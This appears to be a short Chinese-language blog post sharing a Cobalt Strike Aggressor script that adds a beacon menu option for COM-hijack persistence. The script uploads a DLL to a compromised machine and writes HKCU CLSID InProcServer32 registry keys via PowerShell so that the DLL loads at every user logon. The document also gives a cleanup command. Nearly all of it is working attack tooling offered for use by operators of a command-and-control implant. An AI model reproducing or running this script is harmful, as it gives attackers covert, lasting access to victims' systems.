COM劫持利用脚本编写

一个简单的通过com劫持达到持久化的一个脚本

sub Show_COM_GUI{
$bid = $1;
$dialog = dialog("COM劫持用户登陆", %(),
lambda({
bupload($bid, $3['file']);
bmv($bid,$3['DLL_NAME'],$3['DLL_PATH'])
bpowerpick($bid,'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');
bpowerpick($bid,'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');
#brun($bid,"reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"".$3['DLL_PATH'].$3['DLL_NAME']"\" /f")
bpowerpick($bid,"New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value \"".$3['DLL_PATH'].$3['DLL_NAME']"\" ");
bpowerpick($bid,'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32" -name ThreadingModel -value Both');
}));
dialog_description($dialog, "劫持任意用户登陆,任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
drow_file($dialog, "file", "本地DLL路径: ");
drow_text($dialog, "DLL_NAME", "DLL文件名: ");
drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);
}
popup beacon_bottom {
item "&COM持久化" {
local('$bid');
foreach $bid ($1) {
Show_COM_GUI($bid);
}
}
}

通过com劫持任意用户登陆达到持久化,每当有用户登陆时就会触发dll。x32位系统使用x32位dll,x64位用x64位dll。